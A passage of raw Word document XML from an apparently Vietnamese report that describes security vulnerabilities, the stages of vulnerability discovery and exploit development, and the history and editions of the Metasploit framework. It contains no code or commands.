          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="117DCE50" w14:textId="4B992518" w:rsidR="002E4C1E" w:rsidRPr="00C73388" w:rsidRDefault="002E4C1E" w:rsidP="002E4C1E">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Các lổ hỗng bảo mật trên một hệ thống là các điểm yếu có thể tạo ra sự ngưng trệ của dịch vụ, thêm quyền đối với người sử dụng hoặc cho phép các truy nhập không hợp pháp vào hệ thống. Các lổ hỗng cũng có thể nằm ngay trên các dịch vụ cung cấp như sendmail, web, ftp… Ngoài ra các </w:t>
      </w:r>
      <w:r w:rsidR="007167CD" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lổ hỗng</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> còn tồn tại ngay chính tại hệ điều hành như trong Windows NT, Win 95, UNIX hoặc trong các ứng dụng mà người sử dụng thường xuyên sử dụng như trong processing, các hệ database…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0AD64A" w14:textId="55FB2AB0" w:rsidR="002E4C1E" w:rsidRPr="00C73388" w:rsidRDefault="002E4C1E" w:rsidP="00997AB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329F9D4D" w14:textId="2136D619" w:rsidR="002E4C1E" w:rsidRPr="00C73388" w:rsidRDefault="002E4C1E" w:rsidP="002E4C1E">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1.2. Vòng đời phát hiện và khai thác lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0AF3C6" w14:textId="352753DF" w:rsidR="002E4C1E" w:rsidRPr="00C73388" w:rsidRDefault="002E4C1E" w:rsidP="002E4C1E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>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Discovery (phát hiện): Một nhà nghiên cứu bảo mật hoặc cung cấp phát hiện ra một khả năng dễ bị tổn thương trong phần mềm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51E05E" w14:textId="77777777" w:rsidR="002E4C1E" w:rsidRPr="00C73388" w:rsidRDefault="002E4C1E" w:rsidP="002E4C1E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5925250D" w14:textId="508C1CDA" w:rsidR="002E4C1E" w:rsidRPr="00C73388" w:rsidRDefault="002E4C1E" w:rsidP="002E4C1E">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Disclosure (tiết lộ): Nhà nghiên cứu bảo mật thông báo cho nhà cung cấp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DE1302" w14:textId="2A3BAAF8" w:rsidR="002E4C1E" w:rsidRPr="00C73388" w:rsidRDefault="002E4C1E"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13195AA1" w14:textId="148E3D29" w:rsidR="002E4C1E" w:rsidRPr="00C73388" w:rsidRDefault="002E4C1E"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 xml:space="preserve">Analysis (phân tích): các nhà nghiên cứu hoặc những người khác trên toàn thế giới bắt đầu phân tích lổ hỗng </w:t>
      </w:r>
      <w:r w:rsidR="00511916" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>để xác định khả năng khai thác của nó. Nó có thể được khai thác hay không? Hay là khai thác từ xa? Chiều dài của đoạn mã khai thác được tiêm vào làm gì? Giai đoạn này cũng bao gồm việc gỡ lỗi ứng dụng dễ bị thương tổn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD3B9DD" w14:textId="77777777"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p>
    <w:p w14:paraId="2FCD1A9F" w14:textId="4EE96003"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Exploit development (phát triển khai thác): một câu trả lời cho những câu hỏi quan trọng đã được xác định, quán trình phát triển khai thác bắt đầu. Điều này đòi hỏi sự hiểu biết sâu sắc về các thanh ghi của bộ xử lý, mã assembly, địa chỉ offsets và payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69011C93" w14:textId="718CEC8D"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Testing (Kiểm tra): Sau khi khai thác được thực nghiệm và các thông số cụ thể cần thiết cho nó thực thi thành công đã được xác định, coder sẽ phát hành khai thác hoặc riêng tư hoặc trên diễn đàn công cộng. Thỉnh thoảng khai thác sẽ được tinh chỉnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465BCDEA" w14:textId="77777777"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p>
    <w:p w14:paraId="4AF76B0A" w14:textId="78845930"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là một dự án bảo mật máy tính cung cấp các thông tin vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra xâm nhập và phát triển hệ thống phát hiện xâm nhập.</w:t>
      </w:r>
      <w:r w:rsidR="002829DF" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Một dự án con rất nổi tiếng của Metasploit là Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9CB753" w14:textId="77777777" w:rsidR="00511916" w:rsidRPr="00C73388" w:rsidRDefault="00511916" w:rsidP="002E4C1E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD8D557" w14:textId="22B0CD5D" w:rsidR="00F13896" w:rsidRPr="00C73388" w:rsidRDefault="00511916" w:rsidP="00997AB4">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1.3</w:t>
      </w:r>
      <w:r w:rsidR="002E4C1E" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Lịch sử của Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55498CDC" w14:textId="77777777" w:rsidR="00F13896" w:rsidRPr="00C73388" w:rsidRDefault="00F13896" w:rsidP="00F13896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>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project là một dự án máy an ninh máy tính mã nguồn mở cung cấp thông tin về lỗ hổng bảo mật và hỗ trợ việc thử nghiệm thâm nhập và phát triển IDS (Intrusion Detection Systems_Hệ thống phát hiện xâm nhập) signature. Tiểu project nổi tiếng nhất của nó là Metasploit Framework, một công cụ để phát triển và thực thi exploit code (mã khai thác) đối với một máy tính mục tiêu từ xa. Các tiểu project quan trọng khác bao gồm: Database Opcode, lưu trữ shellcode, và nghiên cứu bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ADAF90" w14:textId="77777777" w:rsidR="00F13896" w:rsidRPr="00C73388" w:rsidRDefault="00F13896" w:rsidP="00F13896">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F34E068"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etasploit project cũng nổi tiếng với các công cụ anti-forensic và evasion, một số trong đó được xây dựng vào Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A91DF5C" w14:textId="77777777" w:rsidR="00F13896" w:rsidRPr="00C73388" w:rsidRDefault="00F13896" w:rsidP="00F13896">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A368FB8"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Metasploit đã được tạo ra bởi HD Moore vào năm 2003 như một công cụ mạng di động bằng cách sử dụng ngôn ngữ kịch bản Perl.Sau đó, Metasploit Framework đã được viết lại hoàn toàn bằng ngôn ngữ lập trình Ruby và đã trở thành project Ruby lớn nhất thế giới, với hơn 700,000 dòng code. nó là một công cụ mạnh mẽ cho các nhà nghiên cứu an ninh của bên thứ ba để điều tra lỗ hổng bảo mật tiềm năng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36616D15"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p>
    <w:p w14:paraId="3681940E"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Sau nhiều năm thành công trong cộng đồng hacker/penetration tester. Ngày 21 Tháng 10 năm 2009 có công bố nói rằng Metasploit project đã được mua lại bởi Rapid7, một công ty bảo mật cung cấp các giải pháp quản lý lỗ hổng. Giống như các sản phẩm thương mại tương đương như Canvas của Immunity hoặc Core Impact của Core Security Technologies, Metasploit có thể được sử dụng để kiểm tra lỗ hổng của các hệ thống máy tính để bảo vệ chúng, và nó có thể được sử dụng để đột nhập vào hệ thống từ xa. Cũng như nhiều công cụ bảo mật thông tin khác, Metasploit cũng có thể được sử dụng cho cả các hoạt động hợp pháp và các hoạt động trái phép. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF1CA4" w14:textId="77777777"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p>
    <w:p w14:paraId="39329447" w14:textId="24199F40" w:rsidR="00F13896" w:rsidRPr="00C73388" w:rsidRDefault="00F13896" w:rsidP="00F13896">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Sau đó, Metasploit framework được chia thành ba phiên bản, trong đó có hai phiên bản Metasploit Express và Metasploit Professional là phiên bản thương mại, Metasploit Professional được bán với giá 1.800$. Cả hai đều sở hữu một giao diện khá đẹp nhiều bells và whistles, bao gồm cả chức năng tự động hóa một số cuộc tấn công. Ngoài ra còn có một phiên bản là open source community edition được gọi là Metasploit Community.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1879711E" w14:textId="77777777" w:rsidR="001D4F23" w:rsidRPr="00C73388" w:rsidRDefault="001D4F23" w:rsidP="001D4F23">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C82B65" w14:textId="608BADFF" w:rsidR="001D4F23" w:rsidRPr="00C73388" w:rsidRDefault="001D4F23" w:rsidP="001D4F23">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ay mắn thay, một số nhà phát triển độc lập tại Armitage đã tạo ra một GUI nguồn mở miễn phí cho Metasploit, giao diện khá đẹp và thanh lịch, thích hợp sử dụng cho những người thích chế độ hoạt động point-and-click.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7699F44A" w14:textId="77777777" w:rsidR="001D4F23" w:rsidRPr="00C73388" w:rsidRDefault="001D4F23" w:rsidP="001D4F23">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744F554F" w14:textId="1EFB977A" w:rsidR="001D4F23" w:rsidRDefault="001D4F23" w:rsidP="001D4F23">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Metasploit phiên bản dành cho Windows, sở hữu nhiều tính năng (raw IP packet injection, wireless driver exploi</w:t>
      </w:r>
      <w:r w:rsidR="00F13896" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tation, SMB relaying attacks</w:t>
      </w:r>
      <w:r w:rsidR="002829DF" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidR="00F13896" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) không có sẵn trong môi trường Windows, hạn chế này có thể khắc phục bằng cách sử dụng Cygwin hoặc chạy Windows trong môi trường ảo trên Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B69FF63" w14:textId="77777777" w:rsidR="00B30136" w:rsidRDefault="00B30136" w:rsidP="001D4F23">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C776F6D" w14:textId="74D9662A" w:rsidR="00B30136" w:rsidRDefault="00B30136" w:rsidP="001D4F23">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B30136">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metasplo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>it hiện có trong phiên bản 5.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B30136">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, được bao gồm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong Kali Linux của chúng tôi</w:t>
      </w:r>
      <w:r w:rsidRPr="00B30136">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Nó c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ũng được tích hợp vào BackTrack</w:t>
      </w:r>
      <w:r w:rsidRPr="00B30136">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Đối với những người sử dụng một số phiên bản Linux hoặc Unix khác (bao gồm cả Mac OS), bạn có thể tải xuống Metasploit từ trang web của Rapid7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5331442E" w14:textId="77777777" w:rsidR="00B30136" w:rsidRDefault="00B30136" w:rsidP="001D4F23">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24117A58" w14:textId="0684F7F7" w:rsidR="00B30136" w:rsidRPr="00C73388" w:rsidRDefault="00B30136" w:rsidP="001D4F23">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B30136">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metasploit hiện có nhiều sản phẩm, bao gồm Metasploit Pro (phiên bản thương mại đầy đủ) và phiên bản Cộng đồng được tích hợp vào Kali và vẫn miễn phí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319364D0" w14:textId="36FBFAC4" w:rsidR="002E4C1E" w:rsidRPr="00C73388" w:rsidRDefault="002E4C1E" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8F6097" w14:textId="64C785D5" w:rsidR="002E4C1E" w:rsidRDefault="002E4C1E"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1.</w:t>
      </w:r>
      <w:r w:rsidR="00511916" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00511916" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khái niệm</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mestasploit</w:t>
      </w:r>
      <w:r w:rsidR="001C62E9" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD9FB2F" w14:textId="77777777" w:rsidR="001D4A43" w:rsidRDefault="001D4A43" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E860C1F" w14:textId="0F770B22" w:rsidR="001D4A43" w:rsidRDefault="001D4A43"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1D4A43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metasploit là bộ công cụ hack có sẵn trong các phiên bản</w:t>
      </w:r>
      <w:r w:rsidR="004F6C4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> linux như Kali linux, Backbox</w:t>
      </w:r>
      <w:r w:rsidR="003D1305">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4A43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, nhằm tấn công và khai thác các lỗ hổng bảo mật trên các nền tảng khác nhau như windows, linux, website, cisco, …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E0609" w14:textId="77777777" w:rsidR="001D4A43" w:rsidRPr="00C73388" w:rsidRDefault="001D4A43" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543E74EC" w14:textId="23C2BF0A" w:rsidR="00CC71AD" w:rsidRPr="00C73388" w:rsidRDefault="00CC71AD" w:rsidP="00D4645D">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E13179" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDFAE02" w14:textId="77777777" w:rsidR="006C2B15" w:rsidRPr="00C73388" w:rsidRDefault="006C2B15" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
